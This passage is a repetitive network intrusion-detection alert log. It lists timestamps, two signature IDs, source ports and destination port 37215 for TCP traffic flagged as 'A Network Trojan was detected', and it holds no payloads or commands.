                Timestamp:05/29/24-15:15:39.161350
                SID:2835222
                Source Port:42882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239026
                SID:2829579
                Source Port:44694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321734
                SID:2835222
                Source Port:56280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164938
                SID:2835222
                Source Port:32802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794985
                SID:2835222
                Source Port:32914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521813
                SID:2835222
                Source Port:37104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588777
                SID:2835222
                Source Port:34394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968362
                SID:2829579
                Source Port:50606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714206
                SID:2835222
                Source Port:59182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810474
                SID:2829579
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139961
                SID:2835222
                Source Port:52028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675254
                SID:2835222
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264860
                SID:2835222
                Source Port:48852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896457
                SID:2829579
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076634
                SID:2835222
                Source Port:41266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659836
                SID:2835222
                Source Port:39734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811973
                SID:2829579
                Source Port:37052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867952
                SID:2829579
                Source Port:49838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967325
                SID:2835222
                Source Port:41400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.981141
                SID:2829579
                Source Port:56802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836862
                SID:2829579
                Source Port:37914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281780
                SID:2829579
                Source Port:59240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804235
                SID:2835222
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896188
                SID:2829579
                Source Port:37440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544491
                SID:2835222
                Source Port:32886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218266
                SID:2829579
                Source Port:46290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610157
                SID:2829579
                Source Port:56842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464046
                SID:2829579
                Source Port:48060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611070
                SID:2835222
                Source Port:52360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961929
                SID:2835222
                Source Port:55208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231023
                SID:2829579
                Source Port:50946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441377
                SID:2835222
                Source Port:38384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927865
                SID:2829579
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.926037
                SID:2829579
                Source Port:48580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210045
                SID:2835222
                Source Port:44300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914993
                SID:2829579
                Source Port:56172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787966
                SID:2835222
                Source Port:57584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975788
                SID:2829579
                Source Port:46788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233296
                SID:2829579
                Source Port:60932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854454
                SID:2829579
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928231
                SID:2835222
                Source Port:48746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439152
                SID:2829579
                Source Port:41758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630533
                SID:2829579
                Source Port:60750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166797
                SID:2829579
                Source Port:46360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812970
                SID:2829579
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801429
                SID:2835222
                Source Port:54762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075029
                SID:2829579
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545272
                SID:2829579
                Source Port:45720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386127
                SID:2835222
                Source Port:40372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652511
                SID:2835222
                Source Port:43536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845457
                SID:2835222
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287536
                SID:2835222
                Source Port:43920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663530
                SID:2835222
                Source Port:57216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962777
                SID:2835222
                Source Port:58864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798275
                SID:2829579
                Source Port:35536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930550
                SID:2829579
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791536
                SID:2835222
                Source Port:33900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865430
                SID:2829579
                Source Port:49840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264599
                SID:2835222
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520764
                SID:2829579
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361829
                SID:2829579
                Source Port:44926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573163
                SID:2829579
                Source Port:38014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815523
                SID:2829579
                Source Port:60366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027429
                SID:2829579
                Source Port:58050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765504
                SID:2829579
                Source Port:57804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840123
                SID:2829579
                Source Port:52156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779410
                SID:2829579
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321370
                SID:2829579
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074536
                SID:2829579
                Source Port:44458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556919
                SID:2835222
                Source Port:46246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563233
                SID:2829579
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654760
                SID:2835222
                Source Port:57950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.921289
                SID:2835222
                Source Port:41706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228046
                SID:2835222
                Source Port:44948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390372
                SID:2835222
                Source Port:50770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223120
                SID:2835222
                Source Port:49048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727237
                SID:2835222
                Source Port:35280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268496
                SID:2829579
                Source Port:52730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360524
                SID:2829579
                Source Port:46718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779653
                SID:2835222
                Source Port:59294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263333
                SID:2835222
                Source Port:43282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689066
                SID:2835222
                Source Port:59792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932146
                SID:2829579
                Source Port:45218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936242
                SID:2835222
                Source Port:40298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421839
                SID:2835222
                Source Port:34692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985436
                SID:2835222
                Source Port:38028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780040
                SID:2829579
                Source Port:40994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414220
                SID:2829579
                Source Port:43178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522068
                SID:2829579
                Source Port:59160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320530
                SID:2835222
                Source Port:35392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794051
                SID:2829579
                Source Port:47056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385281
                SID:2835222
                Source Port:51688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316537
                SID:2829579
                Source Port:55046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512319
                SID:2835222
                Source Port:36510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854861
                SID:2829579
                Source Port:43494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009769
                SID:2829579
                Source Port:45170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617325
                SID:2829579
                Source Port:57612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776768
                SID:2829579
                Source Port:48662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653643
                SID:2835222
                Source Port:58918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363294
                SID:2829579
                Source Port:60662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717085
                SID:2829579
                Source Port:34364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416613
                SID:2829579
                Source Port:35502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968164
                SID:2835222
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660322
                SID:2835222
                Source Port:56172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561099
                SID:2835222
                Source Port:55644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166828
                SID:2835222
                Source Port:40458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233315
                SID:2835222
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767537
                SID:2835222
                Source Port:53026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668466
                SID:2835222
                Source Port:56320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689056
                SID:2835222
                Source Port:49440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786139
                SID:2835222
                Source Port:45134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266600
                SID:2835222
                Source Port:35902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788251
                SID:2835222
                Source Port:53544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010798
                SID:2835222
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688858
                SID:2835222
                Source Port:45384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667835
                SID:2829579
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176762
                SID:2829579
                Source Port:55836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264284
                SID:2829579
                Source Port:43134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178726
                SID:2829579
                Source Port:36362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518810
                SID:2835222
                Source Port:53620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043947
                SID:2829579
                Source Port:42542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727274
                SID:2829579
                Source Port:48894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022572
                SID:2829579
                Source Port:50330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465925
                SID:2829579
                Source Port:46762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515448
                SID:2829579
                Source Port:36602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225702
                SID:2835222
                Source Port:57396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732467
                SID:2829579
                Source Port:48486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617454
                SID:2829579
                Source Port:55232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220575
                SID:2835222
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878799
                SID:2829579
                Source Port:59642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779884
                SID:2829579
                Source Port:35698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461845
                SID:2829579
                Source Port:48364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523928
                SID:2829579
                Source Port:47606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703431
                SID:2829579
                Source Port:36676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421106
                SID:2829579
                Source Port:48476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461863
                SID:2835222
                Source Port:43768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994045
                SID:2829579
                Source Port:43530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667813
                SID:2829579
                Source Port:51638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498974
                SID:2829579
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744563
                SID:2835222
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906415
                SID:2835222
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.025423
                SID:2829579
                Source Port:58452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261847
                SID:2835222
                Source Port:47572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371464
                SID:2835222
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714155
                SID:2835222
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560999
                SID:2829579
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507055
                SID:2835222
                Source Port:51490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522871
                SID:2829579
                Source Port:58574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583961
                SID:2835222
                Source Port:55300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420415
                SID:2835222
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869345
                SID:2835222
                Source Port:40370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441205
                SID:2835222
                Source Port:47228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562161
                SID:2829579
                Source Port:33818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223950
                SID:2835222
                Source Port:39672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467287
                SID:2829579
                Source Port:41072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.256943
                SID:2829579
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331434
                SID:2835222
                Source Port:59972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655823
                SID:2829579
                Source Port:37166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240067
                SID:2829579
                Source Port:51850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957899
                SID:2829579
                Source Port:39060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507346
                SID:2829579
                Source Port:32772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852364
                SID:2835222
                Source Port:58534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824173
                SID:2835222
                Source Port:58400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706482
                SID:2829579
                Source Port:45972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210897
                SID:2835222
                Source Port:42414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141199
                SID:2835222
                Source Port:42822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789177
                SID:2829579
                Source Port:37176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359511
                SID:2835222
                Source Port:45426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161313
                SID:2829579
                Source Port:49504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263103
                SID:2829579
                Source Port:53920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765584
                SID:2835222
                Source Port:48620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728348
                SID:2829579
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329628
                SID:2835222
                Source Port:42318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931565
                SID:2829579
                Source Port:49994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854462
                SID:2829579
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374440
                SID:2829579
                Source Port:60052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432452
                SID:2835222
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278204
                SID:2829579
                Source Port:36448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513089
                SID:2829579
                Source Port:52160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689138
                SID:2829579
                Source Port:41900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883899
                SID:2829579
                Source Port:54662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779743
                SID:2835222
                Source Port:45478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511418
                SID:2829579
                Source Port:58008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276846
                SID:2835222
                Source Port:40098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.829190
                SID:2829579
                Source Port:35060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724227
                SID:2835222
                Source Port:56862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207479
                SID:2835222
                Source Port:39318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531998
                SID:2829579
                Source Port:35818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517222
                SID:2829579
                Source Port:60778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440501
                SID:2835222
                Source Port:59800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884036
                SID:2829579
                Source Port:59296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284215
                SID:2835222
                Source Port:49978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025183
                SID:2835222
                Source Port:50614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559243
                SID:2829579
                Source Port:57236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.719767
                SID:2835222
                Source Port:51238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908714
                SID:2829579
                Source Port:40468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013240
                SID:2829579
                Source Port:47812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538350
